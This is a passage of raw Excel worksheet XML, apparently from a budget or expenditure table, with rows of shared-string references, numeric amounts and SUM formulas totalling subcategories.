      <c r="E1217" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1217" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1218" spans="1:6">
      <c r="A1218" s="10"/>
      <c r="B1218" s="10"/>
      <c r="C1218" s="28"/>
      <c r="D1218" s="10" t="s">
        <v>5931</v>
      </c>
      <c r="E1218" s="16" t="s">
        <v>3940</v>
      </c>
      <c r="F1218" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1219" spans="1:6">
      <c r="A1219" s="10"/>
      <c r="B1219" s="10"/>
      <c r="C1219" s="28"/>
      <c r="D1219" s="10" t="s">
        <v>5932</v>
      </c>
      <c r="E1219" s="16" t="s">
        <v>3941</v>
      </c>
      <c r="F1219" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1220" spans="1:6">
      <c r="A1220" s="10"/>
      <c r="B1220" s="10"/>
      <c r="C1220" s="28"/>
      <c r="D1220" s="10" t="s">
        <v>5933</v>
      </c>
      <c r="E1220" s="16" t="s">
        <v>3942</v>
      </c>
      <c r="F1220" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1221" spans="1:6">
      <c r="A1221" s="10"/>
      <c r="B1221" s="10"/>
      <c r="C1221" s="28"/>
      <c r="D1221" s="10" t="s">
        <v>5934</v>
      </c>
      <c r="E1221" s="16" t="s">
        <v>3943</v>
      </c>
      <c r="F1221" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1222" spans="1:6">
      <c r="A1222" s="10"/>
      <c r="B1222" s="10"/>
      <c r="C1222" s="28"/>
      <c r="D1222" s="10" t="s">
        <v>5935</v>
      </c>
      <c r="E1222" s="16" t="s">
        <v>3944</v>
      </c>
      <c r="F1222" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1223" spans="1:6">
      <c r="A1223" s="10"/>
      <c r="B1223" s="10"/>
      <c r="C1223" s="28"/>
      <c r="D1223" s="10" t="s">
        <v>5936</v>
      </c>
      <c r="E1223" s="16" t="s">
        <v>3945</v>
      </c>
      <c r="F1223" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1224" spans="1:6">
      <c r="A1224" s="10"/>
      <c r="B1224" s="10"/>
      <c r="C1224" s="28"/>
      <c r="D1224" s="10" t="s">
        <v>5937</v>
      </c>
      <c r="E1224" s="16" t="s">
        <v>3946</v>
      </c>
      <c r="F1224" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1225" spans="1:6">
      <c r="A1225" s="10"/>
      <c r="B1225" s="10"/>
      <c r="C1225" s="28"/>
      <c r="D1225" s="10" t="s">
        <v>5938</v>
      </c>
      <c r="E1225" s="16" t="s">
        <v>3947</v>
      </c>
      <c r="F1225" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1226" spans="1:6">
      <c r="A1226" s="10"/>
      <c r="B1226" s="10"/>
      <c r="C1226" s="28"/>
      <c r="D1226" s="10" t="s">
        <v>5939</v>
      </c>
      <c r="E1226" s="16" t="s">
        <v>3948</v>
      </c>
      <c r="F1226" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1227" spans="1:6">
      <c r="A1227" s="10"/>
      <c r="B1227" s="10"/>
      <c r="C1227" s="28"/>
      <c r="D1227" s="10" t="s">
        <v>5940</v>
      </c>
      <c r="E1227" s="16" t="s">
        <v>3949</v>
      </c>
      <c r="F1227" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1228" spans="1:6">
      <c r="A1228" s="10"/>
      <c r="B1228" s="10"/>
      <c r="C1228" s="28"/>
      <c r="D1228" s="10" t="s">
        <v>5941</v>
      </c>
      <c r="E1228" s="16" t="s">
        <v>3950</v>
      </c>
      <c r="F1228" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1229" spans="1:6">
      <c r="A1229" s="10"/>
      <c r="B1229" s="10"/>
      <c r="C1229" s="28"/>
      <c r="D1229" s="10" t="s">
        <v>5942</v>
      </c>
      <c r="E1229" s="16" t="s">
        <v>3951</v>
      </c>
      <c r="F1229" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1230" spans="1:6">
      <c r="A1230" s="10"/>
      <c r="B1230" s="10"/>
      <c r="C1230" s="28"/>
      <c r="D1230" s="10" t="s">
        <v>5943</v>
      </c>
      <c r="E1230" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F1230" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1231" spans="1:6">
      <c r="A1231" s="10"/>
      <c r="B1231" s="10"/>
      <c r="C1231" s="28"/>
      <c r="D1231" s="10" t="s">
        <v>5944</v>
      </c>
      <c r="E1231" s="16" t="s">
        <v>3952</v>
      </c>
      <c r="F1231" s="17">
        <v>9</v>
      </c>
    </row>
    <row r="1232" spans="1:6">
      <c r="A1232" s="10"/>
      <c r="B1232" s="10"/>
      <c r="C1232" s="28"/>
      <c r="D1232" s="10" t="s">
        <v>5945</v>
      </c>
      <c r="E1232" s="11" t="s">
        <v>3953</v>
      </c>
      <c r="F1232" s="12">
        <f>SUM(F1233:F1237)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1233" spans="1:6">
      <c r="A1233" s="10"/>
      <c r="B1233" s="10"/>
      <c r="C1233" s="28"/>
      <c r="D1233" s="10" t="s">
        <v>5946</v>
      </c>
      <c r="E1233" s="16" t="s">
        <v>3954</v>
      </c>
      <c r="F1233" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1234" spans="1:6">
      <c r="A1234" s="10"/>
      <c r="B1234" s="10"/>
      <c r="C1234" s="28"/>
      <c r="D1234" s="10" t="s">
        <v>5947</v>
      </c>
      <c r="E1234" s="16" t="s">
        <v>3955</v>
      </c>
      <c r="F1234" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1235" spans="1:6">
      <c r="A1235" s="10"/>
      <c r="B1235" s="10"/>
      <c r="C1235" s="28"/>
      <c r="D1235" s="10" t="s">
        <v>5948</v>
      </c>
      <c r="E1235" s="16" t="s">
        <v>3956</v>
      </c>
      <c r="F1235" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1236" spans="1:6">
      <c r="A1236" s="10"/>
      <c r="B1236" s="10"/>
      <c r="C1236" s="28"/>
      <c r="D1236" s="10" t="s">
        <v>5949</v>
      </c>
      <c r="E1236" s="16" t="s">
        <v>3957</v>
      </c>
      <c r="F1236" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1237" spans="1:6">
      <c r="A1237" s="10"/>
      <c r="B1237" s="10"/>
      <c r="C1237" s="28"/>
      <c r="D1237" s="10" t="s">
        <v>5950</v>
      </c>
      <c r="E1237" s="16" t="s">
        <v>3958</v>
      </c>
      <c r="F1237" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1238" spans="1:6">
      <c r="A1238" s="10"/>
      <c r="B1238" s="10"/>
      <c r="C1238" s="28"/>
      <c r="D1238" s="10" t="s">
        <v>5951</v>
      </c>
      <c r="E1238" s="11" t="s">
        <v>3959</v>
      </c>
      <c r="F1238" s="12">
        <f>SUM(F1239:F1243)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1239" spans="1:6">
      <c r="A1239" s="10"/>
      <c r="B1239" s="10"/>
      <c r="C1239" s="28"/>
      <c r="D1239" s="10" t="s">
        <v>5952</v>
      </c>
      <c r="E1239" s="16" t="s">
        <v>3960</v>
      </c>
      <c r="F1239" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1240" spans="1:6">
      <c r="A1240" s="10"/>
      <c r="B1240" s="10"/>
      <c r="C1240" s="28"/>
      <c r="D1240" s="10" t="s">
        <v>5953</v>
      </c>
      <c r="E1240" s="16" t="s">
        <v>3961</v>
      </c>
      <c r="F1240" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1241" spans="1:6">
      <c r="A1241" s="10"/>
      <c r="B1241" s="10"/>
      <c r="C1241" s="28"/>
      <c r="D1241" s="10" t="s">
        <v>5954</v>
      </c>
      <c r="E1241" s="16" t="s">
        <v>3962</v>
      </c>
      <c r="F1241" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1242" spans="1:6">
      <c r="A1242" s="10"/>
      <c r="B1242" s="10"/>
      <c r="C1242" s="28"/>
      <c r="D1242" s="10" t="s">
        <v>5955</v>
      </c>
      <c r="E1242" s="16" t="s">
        <v>3963</v>
      </c>
      <c r="F1242" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1243" spans="1:6">
      <c r="A1243" s="10"/>
      <c r="B1243" s="10"/>
      <c r="C1243" s="28"/>
      <c r="D1243" s="10" t="s">
        <v>5956</v>
      </c>
      <c r="E1243" s="16" t="s">
        <v>3964</v>
      </c>
      <c r="F1243" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1244" spans="1:6">
      <c r="A1244" s="10"/>
      <c r="B1244" s="10"/>
      <c r="C1244" s="28"/>
      <c r="D1244" s="10" t="s">
        <v>5957</v>
      </c>
      <c r="E1244" s="11" t="s">
        <v>3965</v>
      </c>
      <c r="F1244" s="12">
        <f>SUM(F1245:F1256)</f>
        <v>58</v>
      </c>
    </row>
    <row r="1245" spans="1:6">
      <c r="A1245" s="10"/>
      <c r="B1245" s="10"/>
      <c r="C1245" s="28"/>
      <c r="D1245" s="10" t="s">
        <v>5958</v>
      </c>
      <c r="E1245" s="16" t="s">
        <v>3966</v>
      </c>
      <c r="F1245" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1246" spans="1:6">
      <c r="A1246" s="10"/>
      <c r="B1246" s="10"/>
      <c r="C1246" s="28"/>
      <c r="D1246" s="10" t="s">
        <v>5959</v>
      </c>
      <c r="E1246" s="16" t="s">
        <v>3967</v>
      </c>
      <c r="F1246" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1247" spans="1:6">
      <c r="A1247" s="10"/>
      <c r="B1247" s="10"/>
      <c r="C1247" s="28"/>
      <c r="D1247" s="10" t="s">
        <v>5960</v>
      </c>
      <c r="E1247" s="16" t="s">
        <v>3968</v>
      </c>
      <c r="F1247" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1248" spans="1:6">
      <c r="A1248" s="10"/>
      <c r="B1248" s="10"/>
      <c r="C1248" s="28"/>
      <c r="D1248" s="10" t="s">
        <v>5961</v>
      </c>
      <c r="E1248" s="16" t="s">
        <v>3969</v>
      </c>
      <c r="F1248" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1249" spans="1:6">
      <c r="A1249" s="10"/>
      <c r="B1249" s="10"/>
      <c r="C1249" s="28"/>
      <c r="D1249" s="10" t="s">
        <v>5962</v>
      </c>
      <c r="E1249" s="16" t="s">
        <v>3970</v>
      </c>
      <c r="F1249" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1250" spans="1:6">
      <c r="A1250" s="10"/>
      <c r="B1250" s="10"/>
      <c r="C1250" s="28"/>
      <c r="D1250" s="10" t="s">
        <v>5963</v>
      </c>
      <c r="E1250" s="16" t="s">
        <v>3971</v>
      </c>
      <c r="F1250" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1251" spans="1:6">
      <c r="A1251" s="10"/>
      <c r="B1251" s="10"/>
      <c r="C1251" s="28"/>
      <c r="D1251" s="10" t="s">
        <v>5964</v>
      </c>
      <c r="E1251" s="16" t="s">
        <v>3972</v>
      </c>
      <c r="F1251" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1252" spans="1:6">
      <c r="A1252" s="10"/>
      <c r="B1252" s="10"/>
      <c r="C1252" s="28"/>
      <c r="D1252" s="10" t="s">
        <v>5965</v>
      </c>
      <c r="E1252" s="16" t="s">
        <v>3973</v>
      </c>
      <c r="F1252" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1253" spans="1:6">
      <c r="A1253" s="10"/>
      <c r="B1253" s="10"/>
      <c r="C1253" s="28"/>
      <c r="D1253" s="10" t="s">
        <v>5966</v>
      </c>
      <c r="E1253" s="16" t="s">
        <v>3974</v>
      </c>
      <c r="F1253" s="17">
        <v>8</v>
      </c>
    </row>
    <row r="1254" spans="1:6">
      <c r="A1254" s="10"/>
      <c r="B1254" s="10"/>
      <c r="C1254" s="28"/>
      <c r="D1254" s="10" t="s">
        <v>5967</v>
      </c>
      <c r="E1254" s="16" t="s">
        <v>3975</v>
      </c>
      <c r="F1254" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1255" spans="1:6">
      <c r="A1255" s="10"/>
      <c r="B1255" s="10"/>
      <c r="C1255" s="28"/>
      <c r="D1255" s="10" t="s">
        <v>5968</v>
      </c>
      <c r="E1255" s="16" t="s">
        <v>3976</v>
      </c>
      <c r="F1255" s="17">
        <v>50</v>
      </c>
    </row>
    <row r="1256" spans="1:6">
      <c r="A1256" s="10"/>
      <c r="B1256" s="10"/>
      <c r="C1256" s="28"/>
      <c r="D1256" s="10" t="s">
        <v>5969</v>
      </c>
      <c r="E1256" s="16" t="s">
        <v>3977</v>
      </c>
      <c r="F1256" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1257" spans="1:6">
      <c r="A1257" s="10"/>
      <c r="B1257" s="10"/>
      <c r="C1257" s="28"/>
      <c r="D1257" s="10" t="s">
        <v>5970</v>
      </c>
      <c r="E1257" s="11" t="s">
        <v>3978</v>
      </c>
      <c r="F1257" s="12">
        <f>F1258+F1270+F1276+F1282+F1290+F1303+F1307+F1311</f>
        <v>3593</v>
      </c>
    </row>
    <row r="1258" spans="1:6">
      <c r="A1258" s="10"/>
      <c r="B1258" s="10"/>
      <c r="C1258" s="28"/>
      <c r="D1258" s="10" t="s">
        <v>5971</v>
      </c>
      <c r="E1258" s="11" t="s">
        <v>3979</v>
      </c>
      <c r="F1258" s="12">
        <f>SUM(F1259:F1269)</f>
        <v>949</v>
      </c>
    </row>
    <row r="1259" spans="1:6">
      <c r="A1259" s="10"/>
      <c r="B1259" s="10"/>
      <c r="C1259" s="28"/>
      <c r="D1259" s="10" t="s">
        <v>5972</v>
      </c>
      <c r="E1259" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1259" s="17">
        <v>573</v>
      </c>
    </row>
    <row r="1260" spans="1:6">
      <c r="A1260" s="10"/>
      <c r="B1260" s="10"/>
      <c r="C1260" s="28"/>
      <c r="D1260" s="10" t="s">
        <v>5973</v>
      </c>
      <c r="E1260" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1260" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1261" spans="1:6">
      <c r="A1261" s="10"/>
      <c r="B1261" s="10"/>
      <c r="C1261" s="28"/>
      <c r="D1261" s="10" t="s">
        <v>5974</v>
      </c>
      <c r="E1261" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1261" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1262" spans="1:6">
      <c r="A1262" s="10"/>
      <c r="B1262" s="10"/>
      <c r="C1262" s="28"/>
      <c r="D1262" s="10" t="s">
        <v>5975</v>
      </c>
      <c r="E1262" s="16" t="s">
        <v>3980</v>
      </c>
      <c r="F1262" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1263" spans="1:6">
      <c r="A1263" s="10"/>
      <c r="B1263" s="10"/>
      <c r="C1263" s="28"/>
      <c r="D1263" s="10" t="s">
        <v>5976</v>
      </c>
      <c r="E1263" s="16" t="s">
        <v>3981</v>
      </c>
      <c r="F1263" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1264" spans="1:6">
      <c r="A1264" s="10"/>
      <c r="B1264" s="10"/>
      <c r="C1264" s="28"/>
      <c r="D1264" s="10" t="s">
        <v>5977</v>
      </c>
      <c r="E1264" s="16" t="s">
        <v>3982</v>
      </c>
      <c r="F1264" s="17">
        <v>98</v>
      </c>
    </row>
    <row r="1265" spans="1:6">
      <c r="A1265" s="10"/>
      <c r="B1265" s="10"/>
      <c r="C1265" s="28"/>
      <c r="D1265" s="10" t="s">
        <v>5978</v>
      </c>
      <c r="E1265" s="16" t="s">
        <v>3983</v>
      </c>
      <c r="F1265" s="17">
        <v>30</v>
      </c>
    </row>
    <row r="1266" spans="1:6">
      <c r="A1266" s="10"/>
      <c r="B1266" s="10"/>
      <c r="C1266" s="28"/>
      <c r="D1266" s="10" t="s">
        <v>5979</v>
      </c>
      <c r="E1266" s="16" t="s">
        <v>3984</v>
      </c>
      <c r="F1266" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1267" spans="1:6">
      <c r="A1267" s="10"/>
      <c r="B1267" s="10"/>
      <c r="C1267" s="28"/>
      <c r="D1267" s="10" t="s">
        <v>5980</v>
      </c>
      <c r="E1267" s="16" t="s">
        <v>3985</v>
      </c>
      <c r="F1267" s="17">
        <v>75</v>
      </c>
    </row>
    <row r="1268" spans="1:6">
      <c r="A1268" s="10"/>
      <c r="B1268" s="10"/>
      <c r="C1268" s="28"/>
      <c r="D1268" s="10" t="s">
        <v>5981</v>
      </c>
      <c r="E1268" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F1268" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1269" spans="1:6">
      <c r="A1269" s="10"/>
      <c r="B1269" s="10"/>
      <c r="C1269" s="28"/>
      <c r="D1269" s="10" t="s">
        <v>5982</v>
      </c>
      <c r="E1269" s="16" t="s">
        <v>3986</v>
      </c>
      <c r="F1269" s="17">
        <v>173</v>
      </c>
    </row>
    <row r="1270" spans="1:6">
      <c r="A1270" s="10"/>
      <c r="B1270" s="10"/>
      <c r="C1270" s="28"/>
      <c r="D1270" s="10" t="s">
        <v>5983</v>
      </c>
      <c r="E1270" s="11" t="s">
        <v>3987</v>
      </c>
      <c r="F1270" s="12">
        <f>SUM(F1271:F1275)</f>
        <v>2455</v>
      </c>
    </row>
    <row r="1271" spans="1:6">
      <c r="A1271" s="10"/>
      <c r="B1271" s="10"/>
      <c r="C1271" s="28"/>
      <c r="D1271" s="10" t="s">
        <v>5984</v>
      </c>
      <c r="E1271" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1271" s="17">
        <v>54</v>
      </c>
    </row>
    <row r="1272" spans="1:6">
      <c r="A1272" s="10"/>
      <c r="B1272" s="10"/>
      <c r="C1272" s="28"/>
      <c r="D1272" s="10" t="s">
        <v>5985</v>
      </c>
      <c r="E1272" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1272" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1273" spans="1:6">
      <c r="A1273" s="10"/>
      <c r="B1273" s="10"/>
      <c r="C1273" s="28"/>
      <c r="D1273" s="10" t="s">
        <v>5986</v>
      </c>
      <c r="E1273" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1273" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1274" spans="1:6">
      <c r="A1274" s="10"/>
      <c r="B1274" s="10"/>
      <c r="C1274" s="28"/>
      <c r="D1274" s="10" t="s">
        <v>5987</v>
      </c>
      <c r="E1274" s="16" t="s">
        <v>3988</v>
      </c>
      <c r="F1274" s="17">
        <v>140</v>
      </c>
    </row>
    <row r="1275" spans="1:6">
      <c r="A1275" s="10"/>
      <c r="B1275" s="10"/>
      <c r="C1275" s="28"/>
      <c r="D1275" s="10" t="s">
        <v>5988</v>
      </c>
      <c r="E1275" s="16" t="s">
        <v>3989</v>
      </c>
      <c r="F1275" s="17">
        <v>2261</v>
      </c>
    </row>
    <row r="1276" spans="1:6">
      <c r="A1276" s="10"/>
      <c r="B1276" s="10"/>
      <c r="C1276" s="28"/>
      <c r="D1276" s="10" t="s">
        <v>5989</v>
      </c>
      <c r="E1276" s="11" t="s">
        <v>3990</v>
      </c>
      <c r="F1276" s="12">
        <f>SUM(F1277:F1281)</f>
        <v>2</v>
      </c>
    </row>
    <row r="1277" spans="1:6">
      <c r="A1277" s="10"/>
      <c r="B1277" s="10"/>
      <c r="C1277" s="28"/>
      <c r="D1277" s="10" t="s">
        <v>5990</v>
      </c>
      <c r="E1277" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1277" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1278" spans="1:6">
      <c r="A1278" s="10"/>
      <c r="B1278" s="10"/>
      <c r="C1278" s="28"/>
      <c r="D1278" s="10" t="s">
        <v>5991</v>
      </c>
      <c r="E1278" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1278" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1279" spans="1:6">
      <c r="A1279" s="10"/>
      <c r="B1279" s="10"/>
      <c r="C1279" s="28"/>
      <c r="D1279" s="10" t="s">
        <v>5992</v>
      </c>
      <c r="E1279" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1279" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1280" spans="1:6">
      <c r="A1280" s="10"/>
      <c r="B1280" s="10"/>
      <c r="C1280" s="28"/>
      <c r="D1280" s="10" t="s">
        <v>5993</v>
      </c>
      <c r="E1280" s="16" t="s">
        <v>3991</v>
      </c>
      <c r="F1280" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1281" spans="1:6">
      <c r="A1281" s="10"/>
      <c r="B1281" s="10"/>
      <c r="C1281" s="28"/>
      <c r="D1281" s="10" t="s">
        <v>5994</v>
      </c>
      <c r="E1281" s="16" t="s">
        <v>3992</v>
      </c>
      <c r="F1281" s="17">
        <v>2</v>
      </c>
    </row>
    <row r="1282" spans="1:6">
      <c r="A1282" s="10"/>
      <c r="B1282" s="10"/>
      <c r="C1282" s="28"/>
      <c r="D1282" s="10" t="s">
        <v>5995</v>
      </c>
      <c r="E1282" s="11" t="s">
        <v>3993</v>
      </c>
      <c r="F1282" s="12">
        <f>SUM(F1283:F1289)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1283" spans="1:6">
      <c r="A1283" s="10"/>
      <c r="B1283" s="10"/>
      <c r="C1283" s="28"/>
      <c r="D1283" s="10" t="s">
        <v>5996</v>
      </c>
      <c r="E1283" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1283" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1284" spans="1:6">
      <c r="A1284" s="10"/>
      <c r="B1284" s="10"/>
      <c r="C1284" s="28"/>
      <c r="D1284" s="10" t="s">
        <v>5997</v>
      </c>
      <c r="E1284" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1284" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1285" spans="1:6">
      <c r="A1285" s="10"/>
      <c r="B1285" s="10"/>
      <c r="C1285" s="28"/>
      <c r="D1285" s="10" t="s">
        <v>5998</v>
      </c>
      <c r="E1285" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1285" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1286" spans="1:6">
      <c r="A1286" s="10"/>
      <c r="B1286" s="10"/>
      <c r="C1286" s="28"/>
      <c r="D1286" s="10" t="s">
        <v>5999</v>
      </c>
      <c r="E1286" s="16" t="s">
        <v>3994</v>
      </c>
      <c r="F1286" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1287" spans="1:6">
      <c r="A1287" s="10"/>
      <c r="B1287" s="10"/>
      <c r="C1287" s="28"/>
      <c r="D1287" s="10" t="s">
        <v>6000</v>
      </c>
      <c r="E1287" s="16" t="s">
        <v>3995</v>
      </c>
      <c r="F1287" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1288" spans="1:6">
      <c r="A1288" s="10"/>
      <c r="B1288" s="10"/>
      <c r="C1288" s="28"/>
      <c r="D1288" s="10" t="s">
        <v>6001</v>
      </c>
      <c r="E1288" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F1288" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1289" spans="1:6">
      <c r="A1289" s="10"/>
      <c r="B1289" s="10"/>
      <c r="C1289" s="28"/>
      <c r="D1289" s="10" t="s">
        <v>6002</v>
      </c>
      <c r="E1289" s="16" t="s">
        <v>3996</v>
      </c>
      <c r="F1289" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1290" spans="1:6">
      <c r="A1290" s="10"/>
      <c r="B1290" s="10"/>
      <c r="C1290" s="28"/>
      <c r="D1290" s="10" t="s">
        <v>6003</v>
      </c>
      <c r="E1290" s="11" t="s">
        <v>3997</v>
      </c>
      <c r="F1290" s="12">
        <f>SUM(F1291:F1302)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1291" spans="1:6">
      <c r="A1291" s="10"/>
      <c r="B1291" s="10"/>
      <c r="C1291" s="28"/>
      <c r="D1291" s="10" t="s">
        <v>6004</v>
      </c>
      <c r="E1291" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F1291" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1292" spans="1:6">
      <c r="A1292" s="10"/>
      <c r="B1292" s="10"/>
      <c r="C1292" s="28"/>
      <c r="D1292" s="10" t="s">
        <v>6005</v>
      </c>
      <c r="E1292" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F1292" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1293" spans="1:6">
      <c r="A1293" s="10"/>
      <c r="B1293" s="10"/>
      <c r="C1293" s="28"/>
      <c r="D1293" s="10" t="s">
        <v>6006</v>
      </c>
      <c r="E1293" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F1293" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1294" spans="1:6">
      <c r="A1294" s="10"/>
      <c r="B1294" s="10"/>
      <c r="C1294" s="28"/>
      <c r="D1294" s="10" t="s">
        <v>6007</v>
      </c>
      <c r="E1294" s="16" t="s">
        <v>3998</v>
      </c>
      <c r="F1294" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1295" spans="1:6">
      <c r="A1295" s="10"/>
      <c r="B1295" s="10"/>
      <c r="C1295" s="28"/>
      <c r="D1295" s="10" t="s">
        <v>6008</v>
      </c>
      <c r="E1295" s="16" t="s">
        <v>3999</v>
      </c>
      <c r="F1295" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1296" spans="1:6">
      <c r="A1296" s="10"/>
      <c r="B1296" s="10"/>
      <c r="C1296" s="28"/>
      <c r="D1296" s="10" t="s">
        <v>6009</v>
      </c>
      <c r="E1296" s="16" t="s">
        <v>4000</v>
      </c>
      <c r="F1296" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1297" spans="1:6">
      <c r="A1297" s="10"/>
      <c r="B1297" s="10"/>
      <c r="C1297" s="28"/>
      <c r="D1297" s="10" t="s">
        <v>6010</v>
      </c>
      <c r="E1297" s="16" t="s">
        <v>4001</v>
      </c>
      <c r="F1297" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1298" spans="1:6">
      <c r="A1298" s="10"/>
      <c r="B1298" s="10"/>
      <c r="C1298" s="28"/>
      <c r="D1298" s="10" t="s">
        <v>6011</v>
      </c>
      <c r="E1298" s="16" t="s">
        <v>4002</v>
      </c>
      <c r="F1298" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1299" spans="1:6">
      <c r="A1299" s="10"/>
      <c r="B1299" s="10"/>
      <c r="C1299" s="28"/>
      <c r="D1299" s="10" t="s">
        <v>6012</v>
      </c>
      <c r="E1299" s="16" t="s">
        <v>4003</v>
      </c>
      <c r="F1299" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1300" spans="1:6">
      <c r="A1300" s="10"/>
      <c r="B1300" s="10"/>
      <c r="C1300" s="28"/>
      <c r="D1300" s="10" t="s">
        <v>6013</v>
      </c>
      <c r="E1300" s="16" t="s">
        <v>4004</v>
      </c>
      <c r="F1300" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1301" spans="1:6">
      <c r="A1301" s="10"/>
      <c r="B1301" s="10"/>
      <c r="C1301" s="28"/>
      <c r="D1301" s="10" t="s">
        <v>6014</v>
      </c>
      <c r="E1301" s="16" t="s">
        <v>4005</v>
      </c>
      <c r="F1301" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1302" spans="1:6">
      <c r="A1302" s="10"/>
      <c r="B1302" s="10"/>
      <c r="C1302" s="28"/>
      <c r="D1302" s="10" t="s">
        <v>6015</v>
      </c>
      <c r="E1302" s="16" t="s">
        <v>4006</v>
      </c>
      <c r="F1302" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1303" spans="1:6">
      <c r="A1303" s="10"/>
      <c r="B1303" s="10"/>
      <c r="C1303" s="28"/>
      <c r="D1303" s="10" t="s">
        <v>6016</v>
      </c>
      <c r="E1303" s="11" t="s">
        <v>4007</v>
      </c>
      <c r="F1303" s="12">
        <f>SUM(F1304:F1306)</f>
        <v>0</v>
      </c>
    </row>
    <row r="1304" spans="1:6">
      <c r="A1304" s="10"/>
      <c r="B1304" s="10"/>
      <c r="C1304" s="28"/>
      <c r="D1304" s="10" t="s">
        <v>6017</v>
      </c>
      <c r="E1304" s="16" t="s">
        <v>4008</v>
      </c>
      <c r="F1304" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1305" spans="1:6">
      <c r="A1305" s="10"/>
      <c r="B1305" s="10"/>
      <c r="C1305" s="28"/>
      <c r="D1305" s="10" t="s">
        <v>6018</v>
      </c>
      <c r="E1305" s="16" t="s">
        <v>4009</v>
      </c>
      <c r="F1305" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1306" spans="1:6">
      <c r="A1306" s="10"/>
      <c r="B1306" s="10"/>
      <c r="C1306" s="28"/>
      <c r="D1306" s="10" t="s">
        <v>6019</v>
      </c>
      <c r="E1306" s="16" t="s">
        <v>4010</v>
      </c>
      <c r="F1306" s="17">
        <v>0</v>
      </c>
    </row>
    <row r="1307" spans="1:6">
      <c r="A1307" s="10"/>
      <c r="B1307" s="10"/>
      <c r="C1307" s="28"/>
      <c r="D1307" s="10" t="s">
        <v>6020</v>
      </c>
      <c r="E1307" s="11" t="s">
        <v>4011</v>
      </c>
      <c r="F1307" s="12">
        <f>SUM(F1308:F1310)</f>
        <v>187</v>
      </c>
    </row>
    <row r="1308" spans="1:6">
